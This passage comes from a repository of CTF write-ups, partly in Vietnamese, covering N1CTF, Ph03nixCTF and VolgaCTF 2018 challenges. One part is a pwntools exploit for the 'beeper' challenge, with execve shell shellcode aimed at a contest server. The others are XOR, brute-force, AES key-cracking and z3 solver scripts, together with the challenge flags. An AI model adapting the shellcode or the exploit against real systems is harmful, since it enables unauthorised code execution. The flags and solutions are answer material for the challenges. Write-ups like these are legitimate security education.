chr(ord(shellcode[i])^ord(key[i%len(key)])) 31 | 32 | open(filename,"wb").write(s) 33 | process = Popen(["./encode", filename], stdout=PIPE, stderr=PIPE) 34 | stdout, stderr = process.communicate() 35 | print stdout 36 | 37 | encode() -------------------------------------------------------------------------------- /2018/N1CTF/pwn/beeper/beeper: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/N1CTF/pwn/beeper/beeper -------------------------------------------------------------------------------- /2018/N1CTF/pwn/beeper/beeper.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | from ctypes import CDLL 5 | 6 | def beeper(DEBUG): 7 | shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" 8 | proc = CDLL("/lib/x86_64-linux-gnu/libc-2.23.so") 9 | timefunc = proc.time 10 | srand = proc.srand 11 | rand = proc.rand 12 | 13 | def inc_address(): 14 | return "\x68" 15 | 16 | def inc_value(): 17 | return "\x6d" 18 | 19 | def dec_address(): 20 | return "\x6f" 21 | 22 | def dec_value(): 23 | return "\x75" 24 | 25 | def break_loop(): 26 | return "\x7d\x00" 27 | 28 | def gen_payload_shellcode(address): 29 | for i in xrange(len(shellcode)): 30 | password = "\x00"*0x68 31 | password += p64(address+0x48+i) 32 | password += inc_value()*ord(shellcode[i]) 33 | password += break_loop() 34 | r.sendline(password) 35 | 36 | def ReadPassword(address): 37 | password = "\x00"*0x68 38 | password += p64(address+0x46) 39 | password += dec_value()*(0xc9-0x90) # 0xc9 (leave) => nop 40 | password += inc_address()+dec_value()*(0xc3-0x90) # 0xc3 (ret) => nop 41 | password += break_loop() 42 | r.sendline(password) 43 | gen_payload_shellcode(address) 44 | 45 | if DEBUG=="1": 46 | r = process("./beeper") 47 | elif DEBUG=="2": 48 | HOST = '47.91.210.30' 49 | PORT = 23333 50 | r = remote(HOST,PORT) 51 | 52 | srand(timefunc(0)) 53 | ADDRESS = rand() 54 | ADDRESS = (((ADDRESS + 16) << 12) + (((ADDRESS + 16) << 12) >= 0xFFFFFFFF))-1 55 | ADDRESS = ADDRESS&0xffffffff 56 | log.info('ADDRESS: %#x' % ADDRESS) # Buy function address 57 | 58 | raw_input("debug?") 59 | ReadPassword(ADDRESS) 60 | 61 | password = "\x00"*0x68 62 | password += p64(ADDRESS+0x100) 63 | password += break_loop() # change VM code to do nothing 64 | r.sendline(password) 65 | 66 | password = "\x86\x13\x81\x09\x62\xFF\x44\xD3\x3F\xCD\x19\xB0\xFB\x88\xFD\xAE\x20\xDF" 67 | r.sendline(password) # Login success 68 | 69 | r.sendline("3") # Buy => call shellcode 70 | 71 | r.interactive() 72 | 73 | beeper(sys.argv[1]) 74 | # N1CTF{5h3l1_c0d1n9_w17h_Hbf_1s_s0_e45y_233} -------------------------------------------------------------------------------- /2018/Ph03nixCTF-2018/RE/RE150/chall-0124a47969d0e6ff9ff639198decbea2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/Ph03nixCTF-2018/RE/RE150/chall-0124a47969d0e6ff9ff639198decbea2 -------------------------------------------------------------------------------- /2018/Ph03nixCTF-2018/RE/RE200/RE200.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/Ph03nixCTF-2018/RE/RE200/RE200.exe -------------------------------------------------------------------------------- /2018/Ph03nixCTF-2018/RE/RE200/RE200.py: -------------------------------------------------------------------------------- 1 | a="\xA0\xE3\xA6\xA1\xB0\xE0\x8C\xB0\xA1\xE7\xB0\xB8\xE0\xA1" 2 | def sxor(s1,s2): 3 | return ''.join(chr(ord(a) ^ ord(b)) for a,b in zip(s1,s2)) 4 | 5 | print sxor(a,"\xd3"*len(a)) 6 | # s0urc3_cr4ck3r -------------------------------------------------------------------------------- /2018/Ph03nixCTF-2018/RE/RE200/README.md: -------------------------------------------------------------------------------- 1 | # RE200 2 | **Category:** RE 3 | **Points:** 200 4 | ## Writeup 5 | ``` 6 | $ file RE200.exe 7 | RE200.exe: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows 8 | ``` 9 | Coi sơ binary bài này mình thấy chương trình qua cái hàm nào đó rồi nó yêu cầu mình nhập 1 số vào, sau đó nó lấy 1 byte số đó xor với mem ở địa chỉ 0x408180 rồi chương trình sẽ call 0x408180 10 | 11 | Phải đúng cái số thì mem nó mới ra đúng instruction để ra được flag, mình ngại tính với đoán nên mình code 1 file bat để bruteforce từ 0 -> 255. 12 | ``` 13 | echo 1 | RE200.exe 14 | echo 2 | RE200.exe 15 | echo 3 | RE200.exe 16 | ... 17 | echo 131 | RE200.exe 18 | echo 132 | RE200.exe 19 | echo 133 | RE200.exe 20 | echo 134 | RE200.exe 21 | echo 135 | RE200.exe 22 | echo 136 | RE200.exe 23 | echo 137 | RE200.exe 24 | echo 138 | RE200.exe 25 | echo 139 | RE200.exe 26 | echo 140 | RE200.exe 27 | ... 28 | echo 250 | RE200.exe 29 | echo 251 | RE200.exe 30 | echo 252 | RE200.exe 31 | echo 253 | RE200.exe 32 | echo 254 | RE200.exe 33 | echo 255 | RE200.exe 34 | ``` 35 | **Kết quả bruteforce:** 36 | ``` 37 | D:\CTF\CTFs\2018\Ph0nix\RE>echo 134 | RE200.exe 38 | This challenge brought to you by nghiadtse05330 39 | Give me your farvorite number: 40 | 41 | D:\CTF\CTFs\2018\Ph0nix\RE>echo 135 | RE200.exe 42 | This challenge brought to you by nghiadtse05330 43 | Give me your farvorite number: 44 | 45 | D:\CTF\CTFs\2018\Ph0nix\RE>echo 136 | RE200.exe 46 | This challenge brought to you by nghiadtse05330 47 | Give me your farvorite number: 48 | Enter your name: There is nothing for you 49 | D:\CTF\CTFs\2018\Ph0nix\RE>echo 137 | RE200.exe 50 | This challenge brought to you by nghiadtse05330 51 | Give me your farvorite number: 52 | ``` 53 | 54 | Vậy input nhập vào là 136. 55 | 56 | Tiếp theo trace chương trình sau khi xor mem 0x408180 57 | 58 | Chương trình yêu gọi fgets yêu cầu nhập name, rồi dùng strlen để check length nếu bằng 0x0E thì lấy name xor với 0xD3 rồi dùng strcmp so sánh với mem 0x408374, bằng thì xuất flag 59 | 60 | Vậy mình lấy 0x0E bytes từ 0x408374 ra và xor với 0xD3 là ra name phù hợp. 61 | ```python 62 | a="\xA0\xE3\xA6\xA1\xB0\xE0\x8C\xB0\xA1\xE7\xB0\xB8\xE0\xA1" 63 | def sxor(s1,s2): 64 | return ''.join(chr(ord(a) ^ ord(b)) for a,b in zip(s1,s2)) 65 | 66 | print sxor(a,"\xd3"*len(a)) 67 | # s0urc3_cr4ck3r 68 | ``` 69 | 70 | **Flag:** 71 | ``` 72 | D:\CTF\CTFs\2018\Ph0nix\RE>RE200.exe 73 | This challenge brought to you by nghiadtse05330 74 | Give me your farvorite number: 75 | 136 76 | Enter your name: s0urc3_cr4ck3r 77 | Welcome 200 points for your brilliant 78 | This is your flag: Ph03nix{s0urc3_cr4ck3r_r4t_d3p_tr4i} 79 | ``` -------------------------------------------------------------------------------- /2018/Ph03nixCTF-2018/RE/RE200/re200.bat: -------------------------------------------------------------------------------- 1 | echo 1 | RE200.exe 2 | echo 2 | RE200.exe 3 | echo 3 | RE200.exe 4 | echo 4 | RE200.exe 5 | echo 5 | RE200.exe 6 | echo 6 | RE200.exe 7 | echo 7 | RE200.exe 8 | echo 8 | RE200.exe 9 | echo 9 | RE200.exe 10 | echo 10 | RE200.exe 11 | echo 11 | RE200.exe 12 | echo 12 | RE200.exe 13 | echo 13 | RE200.exe 14 | echo 14 | RE200.exe 15 | echo 15 | RE200.exe 16 | echo 16 | RE200.exe 17 | echo 17 | RE200.exe 18 | echo 18 | RE200.exe 19 | echo 19 | RE200.exe 20 | echo 20 | RE200.exe 21 | echo 21 | RE200.exe 22 | echo 22 | RE200.exe 23 | echo 23 | RE200.exe 24 | echo 24 | RE200.exe 25 | echo 25 | RE200.exe 26 | echo 26 | RE200.exe 27 | echo 27 | RE200.exe 28 | echo 28 | RE200.exe 29 | echo 29 | RE200.exe 30 | echo 30 | RE200.exe 31 | echo 31 | RE200.exe 32 | echo 32 | RE200.exe 33 | echo 33 | RE200.exe 34 | echo 34 | RE200.exe 35 | echo 35 | RE200.exe 36 | echo 36 | RE200.exe 37 | echo 37 | RE200.exe 38 | echo 38 | RE200.exe 39 | echo 39 | RE200.exe 40 | echo 40 | RE200.exe 41 | echo 41 | RE200.exe 42 | echo 42 | RE200.exe 43 | echo 43 | RE200.exe 44 | echo 44 | RE200.exe 45 | echo 45 | RE200.exe 46 | echo 46 | RE200.exe 47 | echo 47 | RE200.exe 48 | echo 48 | RE200.exe 49 | echo 49 | RE200.exe 50 | echo 50 | RE200.exe 51 | echo 51 | RE200.exe 52 | echo 52 | RE200.exe 53 | echo 53 | RE200.exe 54 | echo 54 | RE200.exe 55 | echo 55 | RE200.exe 56 | echo 56 | RE200.exe 57 | echo 57 | RE200.exe 58 | echo 58 | RE200.exe 59 | echo 59 | RE200.exe 60 | echo 60 | RE200.exe 61 | echo 61 | RE200.exe 62 | echo 62 | RE200.exe 63 | echo 63 | RE200.exe 64 | echo 64 | RE200.exe 65 | echo 65 | RE200.exe 66 | echo 66 | RE200.exe 67 | echo 67 | RE200.exe 68 | echo 68 | RE200.exe 69 | echo 69 | RE200.exe 70 | echo 70 | RE200.exe 71 | echo 71 | RE200.exe 72 | echo 72 | RE200.exe 73 | echo 73 | RE200.exe 74 | echo 74 | RE200.exe 75 | echo 75 | RE200.exe 76 | echo 76 | RE200.exe 77 | echo 77 | RE200.exe 78 | echo 78 | RE200.exe 79 | echo 79 | RE200.exe 80 | echo 80 | RE200.exe 81 | echo 81 | RE200.exe 82 | echo 82 | RE200.exe 83 | echo 83 | RE200.exe 84 | echo 84 | RE200.exe 85 | echo 85 | RE200.exe 86 | echo 86 | RE200.exe 87 | echo 87 | RE200.exe 88 | echo 88 | RE200.exe 89 | echo 89 | RE200.exe 90 | echo 90 | RE200.exe 91 | echo 91 | RE200.exe 92 | echo 92 | RE200.exe 93 | echo 93 | RE200.exe 94 | echo 94 | RE200.exe 95 | echo 95 | RE200.exe 96 | echo 96 | RE200.exe 97 | echo 97 | RE200.exe 98 | echo 98 | RE200.exe 99 | echo 99 | RE200.exe 100 | echo 100 | RE200.exe 101 | echo 101 | RE200.exe 102 | echo 102 | RE200.exe 103 | echo 103 | RE200.exe 104 | echo 104 | RE200.exe 105 | echo 105 | RE200.exe 106 | echo 106 | RE200.exe 107 | echo 107 | RE200.exe 108 | echo 108 | RE200.exe 109 | echo 109 | RE200.exe 110 | echo 110 | RE200.exe 111 | echo 111 | RE200.exe 112 | echo 112 | RE200.exe 113 | echo 113 | RE200.exe 114 | echo 114 | RE200.exe 115 | echo 115 | RE200.exe 116 | echo 116 | RE200.exe 117 | echo 117 | RE200.exe 118 | echo 118 | RE200.exe 119 | echo 119 | RE200.exe 120 | echo 120 | RE200.exe 121 | echo 121 | RE200.exe 122 | echo 122 | RE200.exe 123 | echo 123 | RE200.exe 124 | echo 124 | RE200.exe 125 | echo 125 | RE200.exe 126 | echo 126 | RE200.exe 127 | echo 127 | RE200.exe 128 | echo 128 | RE200.exe 129 | echo 129 | RE200.exe 130 | echo 130 | RE200.exe 131 | echo 131 | RE200.exe 132 | echo 132 | RE200.exe 133 | echo 133 | RE200.exe 134 | echo 134 | RE200.exe 135 | echo 135 | RE200.exe 136 | echo 136 | RE200.exe 137 | echo 137 | RE200.exe 138 | echo 138 | RE200.exe 139 | echo 139 | RE200.exe 140 | echo 140 | RE200.exe 141 | echo 141 | RE200.exe 142 | echo 142 | RE200.exe 143 | echo 143 | RE200.exe 144 | echo 144 | RE200.exe 145 | echo 145 | RE200.exe 146 | echo 146 | RE200.exe 147 | echo 147 | RE200.exe 148 | echo 148 | RE200.exe 149 | echo 149 | RE200.exe 150 | echo 150 | RE200.exe 151 | echo 151 | RE200.exe 152 | echo 152 | RE200.exe 153 | echo 153 | RE200.exe 154 | echo 154 | RE200.exe 155 | echo 155 | RE200.exe 156 | echo 156 | RE200.exe 157 | echo 157 | RE200.exe 158 | echo 158 | RE200.exe 159 | echo 159 | RE200.exe 160 | echo 160 | RE200.exe 161 | echo 161 | RE200.exe 162 | echo 162 | RE200.exe 163 | echo 163 | RE200.exe 164 | echo 164 | RE200.exe 165 | echo 165 | RE200.exe 166 | echo 166 | RE200.exe 167 | echo 167 | RE200.exe 168 | echo 168 | RE200.exe 169 | echo 169 | RE200.exe 170 | echo 170 | RE200.exe 171 | echo 171 | RE200.exe 172 | echo 172 | RE200.exe 173 | echo 173 | RE200.exe 174 | echo 174 | RE200.exe 175 | echo 175 | RE200.exe 176 | echo 176 | RE200.exe 177 | echo 177 | RE200.exe 178 | echo 178 | RE200.exe 179 | echo 179 | RE200.exe 180 | echo 180 | RE200.exe 181 | echo 181 | RE200.exe 182 | echo 182 | RE200.exe 183 | echo 183 | RE200.exe 184 | echo 184 | RE200.exe 185 | echo 185 | RE200.exe 186 | echo 186 | RE200.exe 187 | echo 187 | RE200.exe 188 | echo 188 | RE200.exe 189 | echo 189 | RE200.exe 190 | echo 190 | RE200.exe 191 | echo 191 | RE200.exe 192 | echo 192 | RE200.exe 193 | echo 193 | RE200.exe 194 | echo 194 | RE200.exe 195 | echo 195 | RE200.exe 196 | echo 196 | RE200.exe 197 | echo 197 | RE200.exe 198 | echo 198 | RE200.exe 199 | echo 199 | RE200.exe 200 | echo 200 | RE200.exe 201 | echo 201 | RE200.exe 202 | echo 202 | RE200.exe 203 | echo 203 | RE200.exe 204 | echo 204 | RE200.exe 205 | echo 205 | RE200.exe 206 | echo 206 | RE200.exe 207 | echo 207 | RE200.exe 208 | echo 208 | RE200.exe 209 | echo 209 | RE200.exe 210 | echo 210 | RE200.exe 211 | echo 211 | RE200.exe 212 | echo 212 | RE200.exe 213 | echo 213 | RE200.exe 214 | echo 214 | RE200.exe 215 | echo 215 | RE200.exe 216 | echo 216 | RE200.exe 217 | echo 217 | RE200.exe 218 | echo 218 | RE200.exe 219 | echo 219 | RE200.exe 220 | echo 220 | RE200.exe 221 | echo 221 | RE200.exe 222 | echo 222 | RE200.exe 223 | echo 223 | RE200.exe 224 | echo 224 | RE200.exe 225 | echo 225 | RE200.exe 226 | echo 226 | RE200.exe 227 | echo 227 | RE200.exe 228 | echo 228 | RE200.exe 229 | echo 229 | RE200.exe 230 | echo 230 | RE200.exe 231 | echo 231 | RE200.exe 232 | echo 232 | RE200.exe 233 | echo 233 | RE200.exe 234 | echo 234 | RE200.exe 235 | echo 235 | RE200.exe 236 | echo 236 | RE200.exe 237 | echo 237 | RE200.exe 238 | echo 238 | RE200.exe 239 | echo 239 | RE200.exe 240 | echo 240 | RE200.exe 241 | echo 241 | RE200.exe 242 | echo 242 | RE200.exe 243 | echo 243 | RE200.exe 244 | echo 244 | RE200.exe 245 | echo 245 | RE200.exe 246 | echo 246 | RE200.exe 247 | echo 247 | RE200.exe 248 | echo 248 | RE200.exe 249 | echo 249 | RE200.exe 250 | echo 250 | RE200.exe 251 | echo 251 | RE200.exe 252 | echo 252 | RE200.exe 253 | echo 253 | RE200.exe 254 | echo 254 | RE200.exe 255 | echo 255 | RE200.exe 256 | -------------------------------------------------------------------------------- /2018/Ph03nixCTF-2018/RE/RE350/README.md: -------------------------------------------------------------------------------- 1 | # RE350 2 | **Category:** RE 3 | **Points:** 350 4 | ## Writeup 5 | ``` 6 | $ file chall-95464f47e71ccb883149755d7a3573bb 7 | chall-95464f47e71ccb883149755d7a3573bb: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=ba487562699109f09e6273e0fbcc7ed1f81ab161, stripped 8 | ``` 9 | 10 | Coi sơ qua binary bài này thì mình thấy là nó yêu cầu nhập flag 0x45 bytes vào agrument rồi nó qua cái hàm encode rồi xor với cái mem 0x601058 rồi kiểm tra tổng của các phép xor nếu bằng 0 thì báo flag đúng. 11 | Vô ngó hàm encode thì ta thấy nó lấy input của ta add với 1 byte X nào đó rồi đưa lại 1 byte vào input, mà cái byte X đó lấy ra từ 0x601060 và cộng trừ nhân chia gì đó. 12 | 13 | Debug đặt breakpoint ở 0x400772 ta thấy những byte X đó là như sau: "\xffkey-is-wtfkey-is-wtfkey-is-wtfkey-is-wtfkey-is-wtfkey-is-wtfkey-is-wtf..." 14 | 15 | Vậy là ez rồi. 16 | 17 | Viết lại thuật toán bằng python: 18 | ```python 19 | encoded = "\x56\xd0\xd1\xe5\x4d\xcd\xe2\x9b\xdc\x94\xae\x9f\xbd\xa9\x9f\x8a\x93\x86\xe6\xe9\xd8\x8b\xcb\xe5\x8e\xd0\xad\x4d\xc7\xdc\x96\x9e\xd3\xe2\xa5\xe4\xc5\x60\xcd\xa7\xb8\xa0\x98\xd8\x60\xb7\xba\x5e\xc5\xa7\x99\xbd\x96\xc7\x74\xc8\xa4\x62\xd6\xca\x99\xbd\xbe\xd8\x73\xbe\xc1\xaa\x00" 20 | 21 | key = "\xff"+"key-is-wtf"*7 22 | flag = "" 23 | for i in xrange(0, 68): 24 | e = ord(encoded[i]) 25 | k = ord(key[i]) 26 | flag += chr(((e+0x100)-k)&0xff) 27 | print flag 28 | ``` 29 | 30 | **Flag:** 31 | ```$ python chall-95464f47e71ccb883149755d7a3573bb.py 32 | Well done H4X0r! Your flag: Ph03nix{R3V3R53_3NG1N33R1NG_15_V3RY_FUN} 33 | ``` 34 | -------------------------------------------------------------------------------- /2018/Ph03nixCTF-2018/RE/RE350/chall-95464f47e71ccb883149755d7a3573bb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/Ph03nixCTF-2018/RE/RE350/chall-95464f47e71ccb883149755d7a3573bb -------------------------------------------------------------------------------- /2018/Ph03nixCTF-2018/RE/RE350/chall-95464f47e71ccb883149755d7a3573bb.py: -------------------------------------------------------------------------------- 1 | encoded = "\x56\xd0\xd1\xe5\x4d\xcd\xe2\x9b\xdc\x94\xae\x9f\xbd\xa9\x9f\x8a\x93\x86\xe6\xe9\xd8\x8b\xcb\xe5\x8e\xd0\xad\x4d\xc7\xdc\x96\x9e\xd3\xe2\xa5\xe4\xc5\x60\xcd\xa7\xb8\xa0\x98\xd8\x60\xb7\xba\x5e\xc5\xa7\x99\xbd\x96\xc7\x74\xc8\xa4\x62\xd6\xca\x99\xbd\xbe\xd8\x73\xbe\xc1\xaa\x00" 2 | 3 | key = "\xff"+"key-is-wtf"*7 4 | flag = "" 5 | for i in xrange(0, 68): 6 | e = ord(encoded[i]) 7 | k = ord(key[i]) 8 | flag += chr(((e+0x100)-k)&0xff) 9 | print flag 10 | -------------------------------------------------------------------------------- /2018/VolgaCTF/CrackMe/CrackMe.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import time 3 | import threading 4 | 5 | import base64 6 | import hashlib 7 | from Crypto import Random 8 | from Crypto.Cipher import AES 9 | import thread 10 | 11 | class myThread (threading.Thread): 12 | def __init__(self, key): 13 | threading.Thread.__init__(self) 14 | self.key = key 15 | def run(self): 16 | crack(self.key) 17 | 18 | 19 | class AESCipher(object): 20 | def __init__(self, key): 21 | self.bs = 16 22 | self.key = key 23 | 24 | def decrypt(self, enc): 25 | iv = enc[:AES.block_size] 26 | cipher = AES.new(self.key, AES.MODE_CBC, iv) 27 | return self._unpad(cipher.decrypt(enc[AES.block_size:])) 28 | 29 | def _pad(self, s): 30 | return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs) 31 | 32 | @staticmethod 33 | def _unpad(s): 34 | return s[:-ord(s[len(s)-1:])] 35 | 36 | def crack(key): 37 | aes = AESCipher(key) 38 | if "volgactf" in aes.decrypt(enc).lower(): 39 | print key.encode("hex") 40 | print aes.decrypt(enc) 41 | exit(1) 42 | 43 | 44 | enc = open("CrackMe.txt","rb").read() 45 | for i in xrange(256): 46 | print "i: %d" % i 47 | for i2 in xrange(256): 48 | print "i2: %d" % i2 49 | for i3 in xrange(256): 50 | for i4 in xrange(256): 51 | key = chr(i)+chr(i2)+chr(i3)+chr(i4) 52 | key = key*4 53 | crack(key) 54 | 55 | # VolgaCTF{my_little_cat_solved_this_much_faster} -------------------------------------------------------------------------------- /2018/VolgaCTF/You_Shall_Not_Pass/README.md: -------------------------------------------------------------------------------- 1 | We has 40 equations in these functions: 2 | sub_402060, sub_403250, sub_403C90, sub_405740, sub_403470, sub_402640, sub_401490, sub_403680, sub_4042A0, sub_402840, sub_405B80, sub_402E40, sub_405FC0, sub_401A60, sub_405DA0, sub_4061D0, sub_4040B0, sub_403050, sub_402A40, sub_4048D0, sub_405540, sub_401870, sub_404EF0, sub_405310, sub_401260, sub_403890, sub_402C50, sub_403EA0, sub_405100, sub_4046B0, sub_403A80, sub_401E60, sub_401C70, sub_404CD0, sub_404AD0, sub_4044A0, sub_402260, sub_402440, sub_405960, sub_401670 3 | 4 | For each function, first agrument is FLAG, second agrument is global variable checkFlag (1 = correct, 0 = incorrect). 5 | From information about format flag: Flags match **/VolgaCTF{[\x20-\x7F]+}/**, I know 10 character from flag and condition for each other character is **/[\x20-\x7F]/** 6 | I wrote a python script using z3 find flag [solve.py](/2018/VolgaCTF/You_Shall_Not_Pass/solve.py). 7 | Flag: **VolgaCTF{D1$guis3_y0ur_code_and_y0u_@re_s@fe}** -------------------------------------------------------------------------------- /2018/VolgaCTF/You_Shall_Not_Pass/solve.py: -------------------------------------------------------------------------------- 1 | from z3 import * 2 | 3 | x_9=Int('x_9') 4 | x_10=Int('x_10') 5 | x_11=Int('x_11') 6 | x_12=Int('x_12') 7 | x_13=Int('x_13') 8 | x_14=Int('x_14') 9 | x_15=Int('x_15') 10 | x_16=Int('x_16') 11 | x_17=Int('x_17') 12 | x_18=Int('x_18') 13 | x_19=Int('x_19') 14 | x_20=Int('x_20') 15 | x_21=Int('x_21') 16 | x_22=Int('x_22') 17 | x_23=Int('x_23') 18 | x_24=Int('x_24') 19 | x_25=Int('x_25') 20 | x_26=Int('x_26') 21 | x_27=Int('x_27') 22 | x_28=Int('x_28') 23 | x_29=Int('x_29') 24 | x_30=Int('x_30') 25 | x_31=Int('x_31') 26 | x_32=Int('x_32') 27 | x_33=Int('x_33') 28 | x_34=Int('x_34') 29 | x_35=Int('x_35') 30 | x_36=Int('x_36') 31 | x_37=Int('x_37') 32 | x_38=Int('x_38') 33 | x_39=Int('x_39') 34 | x_40=Int('x_40') 35 | x_41=Int('x_41') 36 | x_42=Int('x_42') 37 | x_43=Int('x_43') 38 | solve(x_9 >=32,x_9<=125, x_10 >=32,x_10<=125, x_11 >=32,x_11<=125, x_12 >=32,x_12<=125, x_13 >=32,x_13<=125, x_14 >=32,x_14<=125, x_15 >=32,x_15<=125, x_16 >=32,x_16<=125, x_17 >=32,x_17<=125, x_18 >=32,x_18<=125, x_19 >=32,x_19<=125, x_20 >=32,x_20<=125, x_21 >=32,x_21<=125, x_22 >=32,x_22<=125, x_23 >=32,x_23<=125, x_24 >=32,x_24<=125, x_25 >=32,x_25<=125, x_26 >=32,x_26<=125, x_27 >=32,x_27<=125, x_28 >=32,x_28<=125, x_29 >=32,x_29<=125, x_30 >=32,x_30<=125, x_31 >=32,x_31<=125, x_32 >=32,x_32<=125, x_33 >=32,x_33<=125, x_34 >=32,x_34<=125, x_35 >=32,x_35<=125, x_36 >=32,x_36<=125, x_37 >=32,x_37<=125, x_38 >=32,x_38<=125, x_39 >=32,x_39<=125, x_40 >=32,x_40<=125, x_41 >=32,x_41<=125, x_42 >=32,x_42<=125, x_43 >=32,x_43<=125, 13*x_29+x_36*132*86+13*x_19+3*111-x_30*14*x_30+x_34*60*103-14*x_26-8*x_28-x_28+3*x_19+10*70-97+x_30+8*x_42==1311351, -11*x_43+x_20*20*125+x_35*60*67-x_40*103*1008*111+8*125-10*x_28-7*x_35-2*x_27-4*x_17-x_17-8*x_26-x_18-8*x_9==-1324642844, 11*84+x_25+7*(x_32+x_26)+x_36*180*x_33+x_35*99*x_9-12*x_42-x_22*32*x_27+10*x_15+15*123+8*97-10*x_33+14*123==910067, 15*86+13*x_13+-13*103+3*x_15+3*x_34+6*x_39-x_32*60*x_38+15*x_33+84*60*x_32-4*x_30-x_30-8*x_36-x_36-x_11+8*x_35+7*86==-119712, 9*67+123+86+10*103-x_13*84*108+x_27*16*x_28+12*x_28+2*x_11-14*x_40-12*x_32+15*x_10-4*x_23-x_23-3*x_11-5*67==-914171, 11*x_31+13*x_18+x_18*84*x_26-12*70+14*x_42+6*x_23-x_20*x_33*1260*x_24-125*98*x_17+x_41*270*x_43*x_33+10*123==-701812476, -11*x_23+9*x_36+-7*x_36+x_38*78*86-8*x_40-x_40-x_42*10*x_34-7*x_36+x_36+x_13*x_14*560*x_34-x_32+11*x_32+15*x_35==805471623, 125*55*x_15+x_17*48*x_36+2*(x_19+6*108)-x_14*14*x_38+11*108-12*84*x_14+8*x_11-x_11+x_23*13*x_18-10*97+3*x_21==986086, 13*x_20+7*108-14*x_42-4*x_24+8*x_37+x_19*78*x_36-63*x_24*x_42-x_18-2*x_20-4*x_31+4*x_15+10*x_38+7*x_20-4*x_26==-471203, x_43+x_27+3*x_29+-9*x_20+4*x_15-x_25-x_41+15*x_12-6*x_13+4*x_9-97*24*x_28+130*97*x_41+14*103+8*86-86==584152, 11*x_18-8*x_22+4*x_17-9*x_29+8*x_14-8*111-12*x_38+2*x_26-11*x_14+6*103+x_39*3*x_35-10*x_16+22*x_21*x_29+14*x_42==302239, 15*x_35+-13*x_14+-7*x_41+-7*x_38+9*103+x_39*x_9*360*x_16+6*x_24-x_30+135*108*x_16-9*x_9+4*x_30-x_23*112*x_10==118806054, 13*111+-3*x_25+x_28*150*x_27+-13*x_43+x_38*12*86-4*x_29-x_10-2*x_42+4*x_26-8*x_33-10*x_12+x_39*18*x_24+13*x_20==1675940, x_18+5*x_37+15*x_43+x_16+11*x_13+84*15*x_23-6*x_20-123*10*x_23+135*x_20*84+10*x_19-6*x_18+14*108-12*x_33==1333282, 9*86+9*111+84*156*x_24-4*x_32-x_32+2*x_39+15*x_9+10*x_24-4*x_19+8*x_20+4*x_20-8*x_23-x_23+13*x_40-7*x_29-3*x_36-12*86==1457854, 13*67+13*x_36+7*x_9-15*x_30-12*x_43+11*x_40-12*x_18+12*x_12-11*x_18-97*104*86-x_20*132*111-8*84+8*x_19-x_19+5*x_14==-2582478, 9*x_40+11*x_18+3*x_21+-13*111+x_31+x_30-4*x_29+8*97-97-x_36*210*x_29-14*x_37-6*125*x_21-2*x_39+8*x_29+4*x_35==-1562727, 3*x_31+6*x_19-70*130*x_36+12*x_40-x_12*42*x_31+4*108+10*86+x_10*99*x_28-x_34*40*x_24-8*67+x_12+7*86==-1038889, x_23+5*x_41+9*103+111*15*x_41+5*x_22-15*x_25-x_31*24*x_22-4*x_12-x_16*36*125-10*97+9*123-45*x_34*111==-923909, 15*67+x_33*130*x_40+97+2*x_10-x_35*132*x_16+x_14*75*x_23-2*x_24-6*x_32-2*x_26+4*x_40-11*x_15+4*x_19-8*67==856586, 5*x_31+-15*x_39+x_19*90*x_18+x_27*16*x_16-125*x_41*70*x_28+2*123+x_42*35*x_38+10*70+2*x_12+8*x_29+4*x_20==-53357640, 5*x_23+111+4*(2*x_29-x_18-x_21)+x_28*39*x_12-x_36*x_22*30*x_21+8*x_26-x_26+x_18+12*86-10*x_17-12*x_27*x_17==-20510795, 3*x_41+5*84+8*x_10+10*123-x_41*28*x_9-10*x_30+10*x_21+10*x_19-x_24+5*123-10*x_22-3*x_23+4*x_32+9*x_30+11*x_28==-117294, 9*x_43+15*x_29+111*120*125+12*x_13+12*x_15+14*x_32+10*x_25+13*x_37-4*x_22-x_22+8*x_26-x_26-4*x_36-x_36-x_13+7*x_13-x_40*36*x_38==1256993, 9*x_25+5*123+x_37*28*x_23+6*x_13-6*x_17-3*x_26-2*x_36-6*97-10*x_29-8*103+x_24*99*x_9+4*x_19+x_11*84*x_12==1373634, -3*x_17+9*x_24+4*x_37+9*x_34-4*x_34+8*x_15+70*40*x_42+10*x_15-x_11*x_27*360*x_16+12*67-15*x_10*x_16+13*111==-62537013, -5*x_23+15*x_26+8*x_25+15*x_23-111*90*84-6*x_32-4*123-13*x_32+x_26-x_14*70*x_23-4*x_9-8*x_19-x_12*78*x_33==-1952483, 9*x_22+-7*x_27+8*111+4*(3*x_9-3*x_31)-6*x_10+2*x_38+8*x_41-x_41-4*x_13-x_13-2*123-x_10*60*x_16+111*60*x_38-x_28*7*111==447630, 13*70+-7*x_13+9*x_27+-2*x_35+12*x_34-3*x_14+63*125*x_27-7*x_20+x_37*70*x_42-x_32*156*x_19-2*x_12-12*x_10==656269, 11*x_9+111*56*108-4*84-84-x_20*77*x_14-12*x_34-11*x_38-8*67-15*x_26+x_11*x_41*72*x_29-x_18*x_35*528*x_32==-716423735, -3*x_13+-13*x_38+15*x_26+11*x_13+x_23*110*123+2*(-3*x_25+5*x_27)+x_37*x_9*550*x_34-4*70-70-x_31*135*x_37+12*x_11-9*123==498719083, -7*x_20+-3*x_43+x_29-7*x_35+11*x_34-x_39*x_26*18*x_37-4*86+2*123-8*x_27+8*x_15-x_15-x_26*8*x_33-13*x_26==-19729480, 